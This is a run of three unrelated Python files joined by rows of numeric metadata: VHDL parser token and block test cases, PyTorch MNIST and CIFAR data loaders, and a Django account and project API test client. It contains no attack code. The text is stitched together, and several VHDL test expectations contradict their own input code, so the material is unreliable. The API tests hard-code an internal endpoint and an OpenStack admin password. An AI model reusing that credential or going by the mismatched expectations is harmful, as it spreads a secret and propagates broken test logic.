(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "entity e;"), # entity e;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_OneLine_EndWithKeywordAndName_WrongName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity e is end entity a;"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "e"), # e
(SpaceToken, " "), #
(WordToken, "is"), # is
(SpaceToken, " "), #
(WordToken, "end"), # end
(SpaceToken, " "), #
(WordToken, "entity"), # entity
(SpaceToken, " "), #
(WordToken, "a"), # a
(CharacterToken, ";"), # ;
(EndOfDocumentToken, None) #
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None), #
(Entity.NameBlock, "entity e is"), # entity e is
(WhitespaceBlock, " "), #
(Entity.EndBlock, "end entity a;"), # end entity a;
(EndOfDocumentBlock, None) #
]
)
class SimpleEntity_MultiLine_LongForm(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = dedent("""\
entity e is
end entity e ;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, "\n"),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(CharacterToken, ";"),
(LinebreakToken, "\n"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e ;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_AllLine_LongForm(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = "entity\ne\nis\nend\nentity\ne\n;\n"
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(LinebreakToken, "\n"),
(WordToken, "e"),
(LinebreakToken, "\n"),
(WordToken, "is"),
(LinebreakToken, "\n"),
(WordToken, "end"),
(LinebreakToken, "\n"),
(WordToken, "entity"),
(LinebreakToken, "\n"),
(WordToken, "e"),
(LinebreakToken, "\n"),
(CharacterToken, ";"),
(LinebreakToken, "\n"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity"),
(LinebreakBlock, "\n"),
# (IndentationBlock, "\t"),
(Entity.NameBlock, "e"),
(LinebreakBlock, "\n"),
(Entity.NameBlock, "is"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end\n"),
# (LinebreakBlock, "\n"),
(Entity.EndBlock, "entity\n"),
# (LinebreakBlock, "\n"),
(Entity.EndBlock, "e\n"),
# (LinebreakBlock, "\n"),
(Entity.EndBlock, ";"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
code = dedent("""\
entity e is
generic (
G : integer
);
end entity e;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(WordToken, "generic"),
(SpaceToken, " "),
(CharacterToken, "("),
(LinebreakToken, None),
(IndentationToken, "\t\t"),
(WordToken, "G"),
(SpaceToken, " "),
(CharacterToken, ":"),
(SpaceToken, " "),
(WordToken, "integer"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, ")"),
(CharacterToken, ";"),
(LinebreakToken, None),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(CharacterToken, ";"),
(LinebreakToken, None),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t"),
(GenericList.OpenBlock, "generic ("),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t\t"),
(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
(LinebreakBlock, "\n"),
(GenericList.GenericListInterfaceConstantBlock, "\t"),
(GenericList.CloseBlock, ");"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoGenericKeyword(TestCase, ExpectedDataMixin, TokenLinking, BlockSequenceWithParserError):
code = dedent("""\
entity e is
(
G : integer
);
end entity e;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, "("),
(LinebreakToken, None),
(IndentationToken, "\t\t"),
(WordToken, "G"),
(SpaceToken, " "),
(CharacterToken, ":"),
(SpaceToken, " "),
(WordToken, "integer"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, ")"),
(CharacterToken, ";"),
(LinebreakToken, None),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "a"),
(CharacterToken, ";"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t"),
(GenericList.OpenBlock, "generic ("),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t\t"),
(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
(LinebreakBlock, "\n"),
(GenericList.GenericListInterfaceConstantBlock, "\t"),
(GenericList.CloseBlock, ");"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoOpeningRoundBracket(TestCase, ExpectedDataMixin, TokenLinking):
code = dedent("""\
entity e is
generic
G : integer
);
end entity e;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(WordToken, "generic"),
(LinebreakToken, None),
(IndentationToken, "\t\t"),
(WordToken, "G"),
(SpaceToken, " "),
(CharacterToken, ":"),
(SpaceToken, " "),
(WordToken, "integer"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, ")"),
(CharacterToken, ";"),
(LinebreakToken, None),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "a"),
(CharacterToken, ";"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t"),
(GenericList.OpenBlock, "generic ("),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t\t"),
(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
(LinebreakBlock, "\n"),
(GenericList.GenericListInterfaceConstantBlock, "\t"),
(GenericList.CloseBlock, ");"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoClosingRoundBracket(TestCase, ExpectedDataMixin, TokenLinking):
code = dedent("""\
entity e is
generic (
G : integer
;
end entity e;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(WordToken, "generic"),
(SpaceToken, " "),
(CharacterToken, "("),
(LinebreakToken, None),
(IndentationToken, "\t\t"),
(WordToken, "G"),
(SpaceToken, " "),
(CharacterToken, ":"),
(SpaceToken, " "),
(WordToken, "integer"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, ";"),
(LinebreakToken, None),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "a"),
(CharacterToken, ";"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t"),
(GenericList.OpenBlock, "generic ("),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t\t"),
(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
(LinebreakBlock, "\n"),
(GenericList.GenericListInterfaceConstantBlock, "\t"),
(GenericList.CloseBlock, ");"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_TypoInGeneric(TestCase, ExpectedDataMixin, TokenLinking, BlockSequenceWithParserError):
code = dedent("""\
entity e is
gen (
G : integer
;
end entity e;
""")
tokenStream = ExpectedTokenStream(
[ (StartOfDocumentToken, None),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "e"),
(SpaceToken, " "),
(WordToken, "is"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(WordToken, "gen"),
(SpaceToken, " "),
(CharacterToken, "("),
(LinebreakToken, None),
(IndentationToken, "\t\t"),
(WordToken, "G"),
(SpaceToken, " "),
(CharacterToken, ":"),
(SpaceToken, " "),
(WordToken, "integer"),
(LinebreakToken, None),
(IndentationToken, "\t"),
(CharacterToken, ";"),
(LinebreakToken, None),
(WordToken, "end"),
(SpaceToken, " "),
(WordToken, "entity"),
(SpaceToken, " "),
(WordToken, "a"),
(CharacterToken, ";"),
(EndOfDocumentToken, None)
]
)
blockStream = ExpectedBlockStream(
[ (StartOfDocumentBlock, None),
(Entity.NameBlock, "entity e is"),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t"),
(GenericList.OpenBlock, "generic ("),
(LinebreakBlock, "\n"),
(IndentationBlock, "\t\t"),
(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
(LinebreakBlock, "\n"),
(GenericList.GenericListInterfaceConstantBlock, "\t"),
(GenericList.CloseBlock, ");"),
(LinebreakBlock, "\n"),
(Entity.EndBlock, "end entity e;"),
(LinebreakBlock, "\n"),
(EndOfDocumentBlock, None)
]
)
| 33.923577
| 203
| 0.521306
| 1,318
| 20,863
| 8.213202
| 0.076631
| 0.108822
| 0.024942
| 0.045635
| 0.897644
| 0.880647
| 0.863557
| 0.842217
| 0.816628
| 0.772656
| 0
| 0.000072
| 0.331352
| 20,863
| 614
| 204
| 33.978827
| 0.775914
| 0.023151
| 0
| 0.795139
| 0
| 0
| 0.08579
| 0.001679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001736
| false
| 0
| 0.013889
| 0
| 0.119792
| 0.003472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a609833fb477745632f41fb6dd3c6fb6a9b2167f
| 6,731
|
py
|
Python
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | 2
|
2022-03-19T04:16:41.000Z
|
2022-03-20T20:10:18.000Z
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | 1
|
2022-03-21T09:04:09.000Z
|
2022-03-21T09:04:09.000Z
|
data_loader/data_loaders.py
|
alexcdot/csc-2541-project
|
140ea8cdcfe5d2aee732dc457b99abda3f8457a9
|
[
"MIT"
] | null | null | null |
from torchvision import datasets, transforms
from base import BaseDataLoader
from typing import Optional
import torch
from .wrapped_datasets import CIFAR10WithIndex, CIFAR100WithIndex
import os
import numpy as np
import math
class MnistDataLoader(BaseDataLoader):
"""
MNIST data loading demo using BaseDataLoader
"""
def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True, train_subsample=1.0,
el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
):
if training:
trsfm = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
else:
trsfm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
self.data_dir = data_dir
self.dataset = datasets.MNIST(self.data_dir, train=training, download=True, transform=trsfm)
super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers,
training=training, train_subsample=train_subsample)
class CIFAR10DataLoader(BaseDataLoader):
"""
CIFAR10 data loading demo using BaseDataLoader
"""
def __init__(
self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1,
training=True, train_subsample=1.0, train_idx=None, train_idx_file=None, valid_idx_file=None,
return_index=False,
el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
):
el2n_indices = self.el2n_indices(el2n_subsample, el2n_percent_lb, el2n_percent_ub,
el2n_avg_num, el2n_src, el2n_epoch)
if el2n_indices is not None:
assert train_idx is None, \
"el2n_indices can be successfully retrieved from given request, " \
"train_idx cannot be specified at the same time"
train_idx = el2n_indices
train_idx_file = None
if training:
trsfm = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))
])
else:
trsfm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))
])
self.data_dir = data_dir
self.return_index = return_index
if self.return_index:
self.dataset = CIFAR10WithIndex(self.data_dir, train=training, download=True, transform=trsfm)
else:
self.dataset = datasets.CIFAR10(self.data_dir, train=training, download=True, transform=trsfm)
super().__init__(
self.dataset, batch_size, shuffle, validation_split, num_workers,
training=training, train_subsample=train_subsample, train_idx=train_idx,
train_idx_file=train_idx_file, valid_idx_file=valid_idx_file
)
@classmethod
def from_loader_and_data_subset(
cls,
dataloader,
shuffle: Optional[bool]=None,
training: Optional[bool]=None,
train_idx: Optional[torch.Tensor]=None,
return_index: Optional[bool]=None
):
return cls(
dataloader.data_dir,
dataloader.batch_size,
shuffle if shuffle is not None else dataloader.shuffle,
dataloader.validation_split,
dataloader.num_workers,
training=training if training is not None else dataloader.training,
train_subsample=dataloader.train_subsample,
train_idx=train_idx if train_idx is not None else dataloader.train_idx,
valid_idx_file=dataloader.valid_idx_file,
return_index=return_index if return_index is not None else dataloader.return_index
)
class CIFAR100DataLoader(BaseDataLoader):
"""
CIFAR100 data loading demo using BaseDataLoader
"""
def __init__(
self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1,
training=True, train_subsample=1.0, train_idx=None, train_idx_file=None, valid_idx_file=None,
return_index=False,
el2n_subsample=False, el2n_percent_lb=None, el2n_percent_ub=None,
el2n_avg_num=None, el2n_src=None, el2n_epoch=None,
):
if training:
trsfm = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761))
])
else:
trsfm = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761))
])
self.data_dir = data_dir
self.return_index = return_index
if self.return_index:
self.dataset = CIFAR100WithIndex(self.data_dir, train=training, download=True, transform=trsfm)
else:
self.dataset = datasets.CIFAR100(self.data_dir, train=training, download=True, transform=trsfm)
super().__init__(
self.dataset, batch_size, shuffle, validation_split, num_workers,
training=training, train_subsample=train_subsample, train_idx=train_idx,
train_idx_file=train_idx_file, valid_idx_file=valid_idx_file
)
@classmethod
def from_loader_and_data_subset(
cls,
dataloader,
shuffle: Optional[bool]=None,
training: Optional[bool]=None,
train_idx: Optional[torch.Tensor]=None,
return_index: Optional[bool]=None
):
return cls(
dataloader.data_dir,
dataloader.batch_size,
shuffle if shuffle is not None else dataloader.shuffle,
dataloader.validation_split,
dataloader.num_workers,
training=training if training is not None else dataloader.training,
train_subsample=dataloader.train_subsample,
train_idx=train_idx if train_idx is not None else dataloader.train_idx,
valid_idx_file=dataloader.valid_idx_file,
return_index=return_index if return_index is not None else dataloader.return_index
)
| 42.333333
| 131
| 0.638241
| 776
| 6,731
| 5.280928
| 0.145619
| 0.050756
| 0.029527
| 0.025378
| 0.843094
| 0.843094
| 0.837726
| 0.832845
| 0.81918
| 0.790874
| 0
| 0.042916
| 0.276482
| 6,731
| 158
| 132
| 42.601266
| 0.798563
| 0.020651
| 0
| 0.778571
| 0
| 0
| 0.016651
| 0
| 0
| 0
| 0
| 0
| 0.007143
| 1
| 0.035714
| false
| 0
| 0.057143
| 0.014286
| 0.128571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a647015537ad1cc61581dfca9c7ec96eddb816b5
| 15,881
|
py
|
Python
|
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
app/api_tests/test_account/test_views_account.py
|
21vcloud/Controller
|
63169d220f412330a22e3a2fe9964c73893d4e0f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Web Console Api Client
"""
import datetime
from django.test import TestCase
from BareMetalControllerBackend.conf.env import env_config
from common.api_request import RequestClient
from baremetal_service.repository import service_model as service_model
from baremetal_openstack import handler
class TestAccountClient(TestCase):
def setUp(self):
self.infra_machine_client = RequestClient(
# DEV
endpoint=env_config.account_endpoint,
# endpoint="http://124.251.110.196:9001/account/",
# endpoint="http://127.0.0.1:8003/account/",
# UAT
# endpoint="http://124.251.110.196:8000/uat/account/",
api_key="")
def token_verify(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account, "password": content.password}, method="POST")
response_obj = self.infra_machine_client.token_verify(dict_param={"token": login_response_obj.content.token},
method="GET")
self.assertTrue(response_obj.is_ok)
def token_verify_not_exit(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account, "password": content.password}, method="POST")
response_obj = self.infra_machine_client.token_verify(
dict_param={"token": "123" + login_response_obj.content.token}, method="GET")
self.assertFalse(response_obj.is_ok)
def token_verify_not_timeout(self):
response_obj = self.infra_machine_client.token_verify(
dict_param={"token": "123123|1231231"}, method="GET")
self.assertFalse(response_obj.is_ok)
def register(self):
import datetime
response_obj = self.infra_machine_client.register(
dict_param={"account": "%s@21vianet.com" % datetime.datetime.now(), "password": "abcd-1234"}, method="POST")
self.assertTrue(response_obj.is_ok)
def register_fail(self):
response_obj = self.infra_machine_client.register(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
self.assertFalse(response_obj.is_ok)
def login(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account, "password": content.password}, method="POST")
self.assertTrue(response_obj.is_ok)
def login_fail(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account, "password": content.password + '1'}, method="POST")
self.assertFalse(login_response_obj.is_ok)
def login_fail_for_account(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account + '1', "password": content.password}, method="POST")
self.assertFalse(login_response_obj.is_ok)
def logout(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
login_response_obj = self.infra_machine_client.login(
dict_param={"account": content.account, "password": content.password}, method="POST")
logout_response_obj = self.infra_machine_client.logout(
dict_param={"account": content.account, "password": content.password}, method="POST",
token=login_response_obj.content.token)
self.assertTrue(logout_response_obj.is_ok)
def update_password(self):
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "wei.panlong"}, method="GET")
content = response_obj.content[0]
update_response_obj = self.infra_machine_client.update_password(
dict_param={"email": content.account}, method="POST")
self.assertTrue(update_response_obj.is_ok)
def confirm_update_password(self):
response_obj_password = self.infra_machine_client.update_password(
dict_param={"email": "wei.panlong@21vianet.com"}, method="POST")
response_obj = self.infra_machine_client.confirm_update_password(
dict_param={"email": "wei.panlong@21vianet.com", "code": response_obj_password.content.code,
"new_password": "abcd-1234"}, method="POST")
self.assertTrue(response_obj.is_ok)
def query_account_info_by_keywords(self):
login_response_obj = self.infra_machine_client.login(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
self.assertTrue(response_obj.is_ok)
def user_info_update(self):
login_response_obj = self.infra_machine_client.login(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
dict_param = user_response_obj.json["content"][0]
dict_param.pop("_state")
response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def user_info_update_user_id_error(self):
login_response_obj = self.infra_machine_client.login(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
dict_param = user_response_obj.json["content"][0]
dict_param.pop("_state")
dict_param["id"] = "1231123123"
response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def user_info_update_user_id_not_exit(self):
login_response_obj = self.infra_machine_client.login(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
dict_param = user_response_obj.json["content"][0]
dict_param.pop("_state")
dict_param.pop("id")
response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def user_info_update_param_error(self):
login_response_obj = self.infra_machine_client.login(
dict_param={"account": "wei.panlong@21vianet.com", "password": "abcd-1234"}, method="POST")
user_response_obj = self.infra_machine_client.query_account_info_by_keywords(
dict_param={"keywords": "huo.weiwei"}, method="GET", token=login_response_obj.content.token)
dict_param = user_response_obj.json["content"][0]
response_obj = self.infra_machine_client.user_info_update(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def update_phone(self):
"""
{
"account_id": "5cc1afe1acaea162074f0761",
"phone_number": "15010824265"
}
{
"account_id": "5cc1afe1acaea162074f07611",
"phone_number": "15010824266"
}{
"account_id": "5cc1afe1acaea162074f0761",
"phone_number": "15010824266"
}{
"account_id": "5cc1afe1acaea162074f0761",
"phone_number": "18101029681",
"new_phone_number": "15010824266",
"code": "891547"
}
:return:
"""
pass
class TestAccountProjectClient(TestCase):
def setUp(self):
self.infra_machine_client = RequestClient(
# DEV
endpoint=env_config.account_project_endpoint,
# endpoint="http://124.251.110.196:9001/account/",
# UAT
# endpoint="http://124.251.110.196:8000/uat/account/",
api_key="")
def project_create(self):
dict_param = {
"account_list": ["5cc1afe1acaea162074f0761"],
"project_name": "%s" % datetime.datetime.now(),
"description": "string",
"status": "active",
"create_at": "2019-04-29T03:47:14.025Z"
}
response_obj = self.infra_machine_client.project_create(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def project_create_double_project(self):
dict_param = {
"keywords": "2019",
}
response_obj = self.infra_machine_client.project_info_query_by_keywords(dict_param=dict_param, method="GET")
dict_param = response_obj.json["content"][0]
dict_param.pop("_state")
dict_param.pop("update_at")
response_obj = self.infra_machine_client.project_create(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def project_create_no_account(self):
dict_param = {
"project_name": "%s" % datetime.datetime.now(),
"description": "string",
"status": "active",
"create_at": datetime.datetime.now()
}
response_obj = self.infra_machine_client.project_create(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def project_update(self):
dict_param = {
"id": "5cc6a02dac578ba9e7b4624a",
"account_list": [
"5cc1832aab85c31d2a7b975e", "5cc1832aab85c31d2a7b975e"
],
"project_name": "Melon Test",
"update_at": "2019-04-29T07:13:25.049Z",
}
response_obj = self.infra_machine_client.project_update(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def project_update_no_proejct(self):
dict_param = {
"id": "5cc6a02dac578ba9e7b4624a123",
"account_list": [
"5cc1832aab85c31d2a7b975e",
],
"project_name": "Melon Test",
"update_at": "2019-04-29T07:13:25.049Z",
}
response_obj = self.infra_machine_client.project_update(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def project_info_query_by_keywords(self):
dict_param = {
"keywords": "Melon",
}
response_obj = self.infra_machine_client.project_info_query_by_keywords(dict_param=dict_param, method="GET")
self.assertTrue(response_obj.is_ok)
def project_info_query_by_no_keywords(self):
dict_param = {
"keywords": "",
}
response_obj = self.infra_machine_client.project_info_query_by_keywords(dict_param=dict_param, method="GET")
self.assertTrue(response_obj.is_ok)
def project_info_query_by_no_results(self):
dict_param = {
"keywords": str(datetime.datetime.now()),
}
response_obj = self.infra_machine_client.project_info_query_by_keywords(dict_param=dict_param, method="GET")
self.assertTrue(response_obj.is_ok)
class TestAccountEnterpriseClient(TestCase):
def setUp(self):
self.infra_machine_client = RequestClient(
# DEV
# endpoint=env_config.account_enterprise_endpoint,
# endpoint="http://124.251.110.196:9001/account/",
endpoint="http://172.16.107.71:8000/auth/",
# UAT
# endpoint="http://124.251.110.196:8000/uat/account/",
api_key="")
def enterprise_create(self):
dict_param = {
"enterprise_name": str(datetime.datetime.now()),
"abbreviation": "lenovo",
"description": "联想世纪",
"industry1": "IT服务",
"industry2": "实际",
"location": "北京",
"sales": "魏盼龙",
"system_id": "1232233456789",
"create_at": "2019-04-29T08:39:27.751Z"
}
response_obj = self.infra_machine_client.enterprise_create(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def enterprise_create_repeat_name(self):
dict_param = {
"enterprise_name": "北京联想",
"abbreviation": "lenovo",
"description": "联想世纪",
"industry1": "IT服务",
"industry2": "实际",
"location": "北京",
"sales": "魏盼龙",
"system_id": "1232233456789"
}
response_obj = self.infra_machine_client.enterprise_create(dict_param=dict_param, method="POST")
self.assertFalse(response_obj.is_ok)
def enterprise_info_query_by_keywords(self):
dict_param = {
"keywords": "2019"
}
response_obj = self.infra_machine_client.enterprise_info_query_by_keywords(dict_param=dict_param, method="GET")
self.assertTrue(response_obj.is_ok)
def enterprise_update(self):
query_dict_param = {
"keywords": "2019"
}
query_response_obj = self.infra_machine_client.enterprise_info_query_by_keywords(dict_param=query_dict_param,
method="GET")
dict_param = query_response_obj.json["content"][0]
dict_param.pop("_state")
dict_param.pop("update_at")
dict_param["enterprise_name"] = "wei_%s" % datetime.datetime.now()
response_obj = self.infra_machine_client.enterprise_update(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
def get_session(self):
dict_param = {
"username": "admin",
"password": "ql21Fm7vPMAzbYJvKkf0MsDQj",
"project_name": "admin",
"project_domain_name": "default",
"user_domain_name": "default",
"region": "regionOne"
}
response_obj = self.infra_machine_client.get_session(dict_param=dict_param, method="POST")
self.assertTrue(response_obj.is_ok)
